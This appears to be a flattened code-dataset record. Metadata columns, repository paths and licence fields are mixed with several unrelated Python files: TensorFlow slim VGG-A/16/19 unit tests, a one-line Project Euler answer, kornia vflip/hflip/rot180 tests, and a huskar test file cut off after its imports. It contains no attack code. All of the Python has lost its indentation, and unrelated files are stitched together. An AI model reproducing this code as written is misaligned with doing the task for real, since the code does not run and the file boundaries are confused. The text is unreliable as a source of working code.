| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
07de045b105a45f7f2ffc55d89376d13d03e59d2
| 25,940
|
py
|
Python
|
research/slim/nets/vgg_test.py
|
Dzinushi/models_1_4
|
d7e72793a68c1667d403b1542c205d1cd9b1d17c
|
[
"Apache-2.0"
] | 9
|
2018-12-21T15:11:43.000Z
|
2021-04-28T06:49:30.000Z
|
research/slim/nets/vgg_test.py
|
Dzinushi/models_1_4
|
d7e72793a68c1667d403b1542c205d1cd9b1d17c
|
[
"Apache-2.0"
] | null | null | null |
research/slim/nets/vgg_test.py
|
Dzinushi/models_1_4
|
d7e72793a68c1667d403b1542c205d1cd9b1d17c
|
[
"Apache-2.0"
] | 6
|
2019-01-25T02:53:39.000Z
|
2021-04-28T06:49:33.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.vgg."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import vgg
slim = tf.contrib.slim
class VGGATest(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_a(inputs, num_classes)
self.assertEquals(logits.op.name, 'vgg_a/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 256, 256
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_a(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'vgg_a/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 2, 2, num_classes])
def testGlobalPool(self):
batch_size = 1
height, width = 256, 256
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_a(inputs, num_classes, spatial_squeeze=False,
global_pool=True)
self.assertEquals(logits.op.name, 'vgg_a/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 1, 1, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = vgg.vgg_a(inputs, num_classes)
expected_names = ['vgg_a/conv1/conv1_1',
'vgg_a/pool1',
'vgg_a/conv2/conv2_1',
'vgg_a/pool2',
'vgg_a/conv3/conv3_1',
'vgg_a/conv3/conv3_2',
'vgg_a/pool3',
'vgg_a/conv4/conv4_1',
'vgg_a/conv4/conv4_2',
'vgg_a/pool4',
'vgg_a/conv5/conv5_1',
'vgg_a/conv5/conv5_2',
'vgg_a/pool5',
'vgg_a/fc6',
'vgg_a/fc7',
'vgg_a/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testNoClasses(self):
batch_size = 5
height, width = 224, 224
num_classes = None
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
net, end_points = vgg.vgg_a(inputs, num_classes)
expected_names = ['vgg_a/conv1/conv1_1',
'vgg_a/pool1',
'vgg_a/conv2/conv2_1',
'vgg_a/pool2',
'vgg_a/conv3/conv3_1',
'vgg_a/conv3/conv3_2',
'vgg_a/pool3',
'vgg_a/conv4/conv4_1',
'vgg_a/conv4/conv4_2',
'vgg_a/pool4',
'vgg_a/conv5/conv5_1',
'vgg_a/conv5/conv5_2',
'vgg_a/pool5',
'vgg_a/fc6',
'vgg_a/fc7',
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
self.assertTrue(net.op.name.startswith('vgg_a/fc7'))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
vgg.vgg_a(inputs, num_classes)
expected_names = ['vgg_a/conv1/conv1_1/weights',
'vgg_a/conv1/conv1_1/biases',
'vgg_a/conv2/conv2_1/weights',
'vgg_a/conv2/conv2_1/biases',
'vgg_a/conv3/conv3_1/weights',
'vgg_a/conv3/conv3_1/biases',
'vgg_a/conv3/conv3_2/weights',
'vgg_a/conv3/conv3_2/biases',
'vgg_a/conv4/conv4_1/weights',
'vgg_a/conv4/conv4_1/biases',
'vgg_a/conv4/conv4_2/weights',
'vgg_a/conv4/conv4_2/biases',
'vgg_a/conv5/conv5_1/weights',
'vgg_a/conv5/conv5_1/biases',
'vgg_a/conv5/conv5_2/weights',
'vgg_a/conv5/conv5_2/biases',
'vgg_a/fc6/weights',
'vgg_a/fc6/biases',
'vgg_a/fc7/weights',
'vgg_a/fc7/biases',
'vgg_a/fc8/weights',
'vgg_a/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_a(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 256, 256
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = vgg.vgg_a(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = vgg.vgg_a(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 2, 2, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_a(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
class VGG16Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_16(inputs, num_classes)
self.assertEquals(logits.op.name, 'vgg_16/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 256, 256
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_16(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'vgg_16/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 2, 2, num_classes])
def testGlobalPool(self):
batch_size = 1
height, width = 256, 256
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_16(inputs, num_classes, spatial_squeeze=False,
global_pool=True)
self.assertEquals(logits.op.name, 'vgg_16/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 1, 1, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = vgg.vgg_16(inputs, num_classes)
expected_names = ['vgg_16/conv1/conv1_1',
'vgg_16/conv1/conv1_2',
'vgg_16/pool1',
'vgg_16/conv2/conv2_1',
'vgg_16/conv2/conv2_2',
'vgg_16/pool2',
'vgg_16/conv3/conv3_1',
'vgg_16/conv3/conv3_2',
'vgg_16/conv3/conv3_3',
'vgg_16/pool3',
'vgg_16/conv4/conv4_1',
'vgg_16/conv4/conv4_2',
'vgg_16/conv4/conv4_3',
'vgg_16/pool4',
'vgg_16/conv5/conv5_1',
'vgg_16/conv5/conv5_2',
'vgg_16/conv5/conv5_3',
'vgg_16/pool5',
'vgg_16/fc6',
'vgg_16/fc7',
'vgg_16/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testNoClasses(self):
batch_size = 5
height, width = 224, 224
num_classes = None
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
net, end_points = vgg.vgg_16(inputs, num_classes)
expected_names = ['vgg_16/conv1/conv1_1',
'vgg_16/conv1/conv1_2',
'vgg_16/pool1',
'vgg_16/conv2/conv2_1',
'vgg_16/conv2/conv2_2',
'vgg_16/pool2',
'vgg_16/conv3/conv3_1',
'vgg_16/conv3/conv3_2',
'vgg_16/conv3/conv3_3',
'vgg_16/pool3',
'vgg_16/conv4/conv4_1',
'vgg_16/conv4/conv4_2',
'vgg_16/conv4/conv4_3',
'vgg_16/pool4',
'vgg_16/conv5/conv5_1',
'vgg_16/conv5/conv5_2',
'vgg_16/conv5/conv5_3',
'vgg_16/pool5',
'vgg_16/fc6',
'vgg_16/fc7',
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
self.assertTrue(net.op.name.startswith('vgg_16/fc7'))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
vgg.vgg_16(inputs, num_classes)
expected_names = ['vgg_16/conv1/conv1_1/weights',
'vgg_16/conv1/conv1_1/biases',
'vgg_16/conv1/conv1_2/weights',
'vgg_16/conv1/conv1_2/biases',
'vgg_16/conv2/conv2_1/weights',
'vgg_16/conv2/conv2_1/biases',
'vgg_16/conv2/conv2_2/weights',
'vgg_16/conv2/conv2_2/biases',
'vgg_16/conv3/conv3_1/weights',
'vgg_16/conv3/conv3_1/biases',
'vgg_16/conv3/conv3_2/weights',
'vgg_16/conv3/conv3_2/biases',
'vgg_16/conv3/conv3_3/weights',
'vgg_16/conv3/conv3_3/biases',
'vgg_16/conv4/conv4_1/weights',
'vgg_16/conv4/conv4_1/biases',
'vgg_16/conv4/conv4_2/weights',
'vgg_16/conv4/conv4_2/biases',
'vgg_16/conv4/conv4_3/weights',
'vgg_16/conv4/conv4_3/biases',
'vgg_16/conv5/conv5_1/weights',
'vgg_16/conv5/conv5_1/biases',
'vgg_16/conv5/conv5_2/weights',
'vgg_16/conv5/conv5_2/biases',
'vgg_16/conv5/conv5_3/weights',
'vgg_16/conv5/conv5_3/biases',
'vgg_16/fc6/weights',
'vgg_16/fc6/biases',
'vgg_16/fc7/weights',
'vgg_16/fc7/biases',
'vgg_16/fc8/weights',
'vgg_16/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_16(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 256, 256
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = vgg.vgg_16(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = vgg.vgg_16(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 2, 2, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_16(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
class VGG19Test(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_19(inputs, num_classes)
self.assertEquals(logits.op.name, 'vgg_19/fc8/squeezed')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testFullyConvolutional(self):
batch_size = 1
height, width = 256, 256
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_19(inputs, num_classes, spatial_squeeze=False)
self.assertEquals(logits.op.name, 'vgg_19/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 2, 2, num_classes])
def testGlobalPool(self):
batch_size = 1
height, width = 256, 256
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_19(inputs, num_classes, spatial_squeeze=False,
global_pool=True)
self.assertEquals(logits.op.name, 'vgg_19/fc8/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, 1, 1, num_classes])
def testEndPoints(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
_, end_points = vgg.vgg_19(inputs, num_classes)
expected_names = [
'vgg_19/conv1/conv1_1',
'vgg_19/conv1/conv1_2',
'vgg_19/pool1',
'vgg_19/conv2/conv2_1',
'vgg_19/conv2/conv2_2',
'vgg_19/pool2',
'vgg_19/conv3/conv3_1',
'vgg_19/conv3/conv3_2',
'vgg_19/conv3/conv3_3',
'vgg_19/conv3/conv3_4',
'vgg_19/pool3',
'vgg_19/conv4/conv4_1',
'vgg_19/conv4/conv4_2',
'vgg_19/conv4/conv4_3',
'vgg_19/conv4/conv4_4',
'vgg_19/pool4',
'vgg_19/conv5/conv5_1',
'vgg_19/conv5/conv5_2',
'vgg_19/conv5/conv5_3',
'vgg_19/conv5/conv5_4',
'vgg_19/pool5',
'vgg_19/fc6',
'vgg_19/fc7',
'vgg_19/fc8'
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
def testNoClasses(self):
batch_size = 5
height, width = 224, 224
num_classes = None
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
net, end_points = vgg.vgg_19(inputs, num_classes)
expected_names = [
'vgg_19/conv1/conv1_1',
'vgg_19/conv1/conv1_2',
'vgg_19/pool1',
'vgg_19/conv2/conv2_1',
'vgg_19/conv2/conv2_2',
'vgg_19/pool2',
'vgg_19/conv3/conv3_1',
'vgg_19/conv3/conv3_2',
'vgg_19/conv3/conv3_3',
'vgg_19/conv3/conv3_4',
'vgg_19/pool3',
'vgg_19/conv4/conv4_1',
'vgg_19/conv4/conv4_2',
'vgg_19/conv4/conv4_3',
'vgg_19/conv4/conv4_4',
'vgg_19/pool4',
'vgg_19/conv5/conv5_1',
'vgg_19/conv5/conv5_2',
'vgg_19/conv5/conv5_3',
'vgg_19/conv5/conv5_4',
'vgg_19/pool5',
'vgg_19/fc6',
'vgg_19/fc7',
]
self.assertSetEqual(set(end_points.keys()), set(expected_names))
self.assertTrue(net.op.name.startswith('vgg_19/fc7'))
def testModelVariables(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
vgg.vgg_19(inputs, num_classes)
expected_names = [
'vgg_19/conv1/conv1_1/weights',
'vgg_19/conv1/conv1_1/biases',
'vgg_19/conv1/conv1_2/weights',
'vgg_19/conv1/conv1_2/biases',
'vgg_19/conv2/conv2_1/weights',
'vgg_19/conv2/conv2_1/biases',
'vgg_19/conv2/conv2_2/weights',
'vgg_19/conv2/conv2_2/biases',
'vgg_19/conv3/conv3_1/weights',
'vgg_19/conv3/conv3_1/biases',
'vgg_19/conv3/conv3_2/weights',
'vgg_19/conv3/conv3_2/biases',
'vgg_19/conv3/conv3_3/weights',
'vgg_19/conv3/conv3_3/biases',
'vgg_19/conv3/conv3_4/weights',
'vgg_19/conv3/conv3_4/biases',
'vgg_19/conv4/conv4_1/weights',
'vgg_19/conv4/conv4_1/biases',
'vgg_19/conv4/conv4_2/weights',
'vgg_19/conv4/conv4_2/biases',
'vgg_19/conv4/conv4_3/weights',
'vgg_19/conv4/conv4_3/biases',
'vgg_19/conv4/conv4_4/weights',
'vgg_19/conv4/conv4_4/biases',
'vgg_19/conv5/conv5_1/weights',
'vgg_19/conv5/conv5_1/biases',
'vgg_19/conv5/conv5_2/weights',
'vgg_19/conv5/conv5_2/biases',
'vgg_19/conv5/conv5_3/weights',
'vgg_19/conv5/conv5_3/biases',
'vgg_19/conv5/conv5_4/weights',
'vgg_19/conv5/conv5_4/biases',
'vgg_19/fc6/weights',
'vgg_19/fc6/biases',
'vgg_19/fc7/weights',
'vgg_19/fc7/biases',
'vgg_19/fc8/weights',
'vgg_19/fc8/biases',
]
model_variables = [v.op.name for v in slim.get_model_variables()]
self.assertSetEqual(set(model_variables), set(expected_names))
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_19(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testTrainEvalWithReuse(self):
train_batch_size = 2
eval_batch_size = 1
train_height, train_width = 224, 224
eval_height, eval_width = 256, 256
num_classes = 1000
with self.test_session():
train_inputs = tf.random_uniform(
(train_batch_size, train_height, train_width, 3))
logits, _ = vgg.vgg_19(train_inputs)
self.assertListEqual(logits.get_shape().as_list(),
[train_batch_size, num_classes])
tf.get_variable_scope().reuse_variables()
eval_inputs = tf.random_uniform(
(eval_batch_size, eval_height, eval_width, 3))
logits, _ = vgg.vgg_19(eval_inputs, is_training=False,
spatial_squeeze=False)
self.assertListEqual(logits.get_shape().as_list(),
[eval_batch_size, 2, 2, num_classes])
logits = tf.reduce_mean(logits, [1, 2])
predictions = tf.argmax(logits, 1)
self.assertEquals(predictions.get_shape().as_list(), [eval_batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = vgg.vgg_19(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
| 44.34188
| 83
| 0.504588
| 2,844
| 25,940
| 4.308017
| 0.061885
| 0.040402
| 0.03428
| 0.05142
| 0.92491
| 0.804767
| 0.793748
| 0.793748
| 0.79334
| 0.785749
| 0
| 0.079391
| 0.38963
| 25,940
| 584
| 84
| 44.417808
| 0.694436
| 0.026291
| 0
| 0.715631
| 0
| 0
| 0.177741
| 0.079995
| 0
| 0
| 0
| 0
| 0.090395
| 1
| 0.050847
| false
| 0
| 0.009416
| 0
| 0.065913
| 0.001883
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed10f6aee5348f898ba8bed4639d058020542b36
| 51
|
py
|
Python
|
src/005. Smallest multiple/005.py
|
yuhao600/project-euler
|
201fc68aa9cca63b751036bb61623c12939dcac4
|
[
"MIT"
] | 15
|
2015-02-04T13:47:04.000Z
|
2021-12-22T08:40:13.000Z
|
src/005. Smallest multiple/005.py
|
yuhao600/project-euler
|
201fc68aa9cca63b751036bb61623c12939dcac4
|
[
"MIT"
] | null | null | null |
src/005. Smallest multiple/005.py
|
yuhao600/project-euler
|
201fc68aa9cca63b751036bb61623c12939dcac4
|
[
"MIT"
] | 3
|
2016-02-19T10:47:31.000Z
|
2017-03-03T16:44:15.000Z
|
print(2 ** 4 * 3 ** 2 * 5 * 7 * 11 * 13 * 17 * 19)
| 25.5
| 50
| 0.372549
| 11
| 51
| 1.727273
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4375
| 0.372549
| 51
| 1
| 51
| 51
| 0.15625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
ed17897d3d9f58ed7bbfc779290bd24a9f15fcc2
| 6,440
|
py
|
Python
|
test/geometry/transform/test_flip.py
|
ChristophReich1996/kornia
|
35f955b46e8015da1cb9faa28c6943ec2b09cc2a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/geometry/transform/test_flip.py
|
ChristophReich1996/kornia
|
35f955b46e8015da1cb9faa28c6943ec2b09cc2a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/geometry/transform/test_flip.py
|
ChristophReich1996/kornia
|
35f955b46e8015da1cb9faa28c6943ec2b09cc2a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import pytest
import torch
from torch.autograd import gradcheck
from torch.testing import assert_allclose
import kornia
import kornia.testing as utils # test utils
class TestVflip:
def smoke_test(self, device, dtype):
f = kornia.Vflip()
repr = "Vflip()"
assert str(f) == repr
def test_vflip(self, device, dtype):
f = kornia.Vflip()
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
expected = torch.tensor([[0., 1., 1.], [0., 0., 0.], [0., 0., 0.]], device=device, dtype=dtype) # 3 x 3
assert (f(input) == expected).all()
def test_batch_vflip(self, device, dtype):
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
input = input.repeat(2, 1, 1) # 2 x 3 x 3
f = kornia.Vflip()
expected = torch.tensor([[[0., 1., 1.], [0., 0., 0.], [0., 0., 0.]]], device=device, dtype=dtype) # 1 x 3 x 3
expected = expected.repeat(2, 1, 1) # 2 x 3 x 3
assert (f(input) == expected).all()
@pytest.mark.skip(reason="turn off all jit for a while")
def test_jit(self, device, dtype):
@torch.jit.script
def op_script(data: torch.Tensor) -> torch.Tensor:
return kornia.vflip(data)
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
# Build jit trace
op_trace = torch.jit.trace(op_script, (input, ))
# Create new inputs
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [5., 5., 0.]], device=device, dtype=dtype) # 3 x 3
input = input.repeat(2, 1, 1) # 2 x 3 x 3
expected = torch.tensor([[[5., 5., 0.], [0., 0., 0.], [0., 0., 0.]]], device=device, dtype=dtype) # 3 x 3
expected = expected.repeat(2, 1, 1)
actual = op_trace(input)
assert_allclose(actual, expected)
def test_gradcheck(self, device, dtype):
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
input = utils.tensor_to_gradcheck_var(input) # to var
assert gradcheck(kornia.Vflip(), (input, ), raise_exception=True)
class TestHflip:
def smoke_test(self, device, dtype):
f = kornia.Hflip()
repr = "Hflip()"
assert str(f) == repr
def test_hflip(self, device, dtype):
f = kornia.Hflip()
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
expected = torch.tensor([[0., 0., 0.], [0., 0., 0.], [1., 1., 0.]], device=device, dtype=dtype) # 3 x 3
assert (f(input) == expected).all()
def test_batch_hflip(self, device, dtype):
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 1 x 3 x 3
input = input.repeat(2, 1, 1) # 2 x 3 x 3
f = kornia.Hflip()
expected = torch.tensor([[[0., 0., 0.], [0., 0., 0.], [1., 1., 0.]]], device=device, dtype=dtype) # 3 x 3
expected = expected.repeat(2, 1, 1) # 2 x 3 x 3
assert (f(input) == expected).all()
@pytest.mark.skip(reason="turn off all jit for a while")
def test_jit(self, device, dtype):
@torch.jit.script
def op_script(data: torch.Tensor) -> torch.Tensor:
return kornia.hflip(data)
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
# Build jit trace
op_trace = torch.jit.trace(op_script, (input, ))
# Create new inputs
input = torch.tensor([[0., 0., 0.], [5., 5., 0.], [0., 0., 0.]], device=device, dtype=dtype) # 3 x 3
input = input.repeat(2, 1, 1) # 2 x 3 x 3
expected = torch.tensor([[[0., 0., 0.], [0., 5., 5.], [0., 0., 0.]]], device=device, dtype=dtype) # 3 x 3
expected = expected.repeat(2, 1, 1)
actual = op_trace(input)
assert_allclose(actual, expected)
def test_gradcheck(self, device, dtype):
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
input = utils.tensor_to_gradcheck_var(input) # to var
assert gradcheck(kornia.Hflip(), (input, ), raise_exception=True)
class TestRot180:
def smoke_test(self, device, dtype):
f = kornia.Rot180()
repr = "Rot180()"
assert str(f) == repr
def test_rot180(self, device, dtype):
f = kornia.Rot180()
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
expected = torch.tensor([[1., 1., 0.], [0., 0., 0.], [0., 0., 0.]], device=device, dtype=dtype) # 3 x 3
assert (f(input) == expected).all()
def test_batch_rot180(self, device, dtype):
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
input = input.repeat(2, 1, 1) # 2 x 3 x 3
f = kornia.Rot180()
expected = torch.tensor([[1., 1., 0.], [0., 0., 0.], [0., 0., 0.]], device=device, dtype=dtype) # 1 x 3 x 3
expected = expected.repeat(2, 1, 1) # 2 x 3 x 3
assert (f(input) == expected).all()
@pytest.mark.skip(reason="turn off all jit for a while")
def test_jit(self, device, dtype):
@torch.jit.script
def op_script(data: torch.Tensor) -> torch.Tensor:
return kornia.rot180(data)
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
# Build jit trace
op_trace = torch.jit.trace(op_script, (input, ))
# Create new inputs
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [5., 5., 0.]], device=device, dtype=dtype) # 3 x 3
input = input.repeat(2, 1, 1) # 2 x 3 x 3
expected = torch.tensor([[[0., 5., 5.], [0., 0., 0.], [0., 0., 0.]]], device=device, dtype=dtype) # 3 x 3
expected = expected.repeat(2, 1, 1)
actual = op_trace(input)
assert_allclose(actual, expected)
def test_gradcheck(self, device, dtype):
input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype) # 3 x 3
input = utils.tensor_to_gradcheck_var(input) # to var
assert gradcheck(kornia.Rot180(), (input, ), raise_exception=True)
| 32.2
| 118
| 0.535404
| 972
| 6,440
| 3.5
| 0.065844
| 0.079365
| 0.09612
| 0.09759
| 0.911229
| 0.894768
| 0.847443
| 0.847443
| 0.815109
| 0.814521
| 0
| 0.075652
| 0.267236
| 6,440
| 199
| 119
| 32.361809
| 0.645264
| 0.058851
| 0
| 0.703704
| 0
| 0
| 0.017617
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 1
| 0.166667
| false
| 0
| 0.055556
| 0.027778
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e888f2cd298b6eaf301925888333178efad0e0
| 3,121
|
py
|
Python
|
tests/test_api/test_huskar_admin.py
|
mowangdk/huskar
|
7692fbc5672a5ae6e2a33616c493466a7137f8cd
|
[
"MIT"
] | 59
|
2019-10-31T10:50:10.000Z
|
2021-11-26T04:32:25.000Z
|
tests/test_api/test_huskar_admin.py
|
mowangdk/huskar
|
7692fbc5672a5ae6e2a33616c493466a7137f8cd
|
[
"MIT"
] | 5
|
2019-10-31T10:37:30.000Z
|
2020-03-02T06:45:46.000Z
|
tests/test_api/test_huskar_admin.py
|
mowangdk/huskar
|
7692fbc5672a5ae6e2a33616c493466a7137f8cd
|
[
"MIT"
] | 9
|
2019-10-31T10:35:00.000Z
|
2019-12-01T14:13:58.000Z
|
from __future__ import absolute_import
from huskar_api.models.auth import User
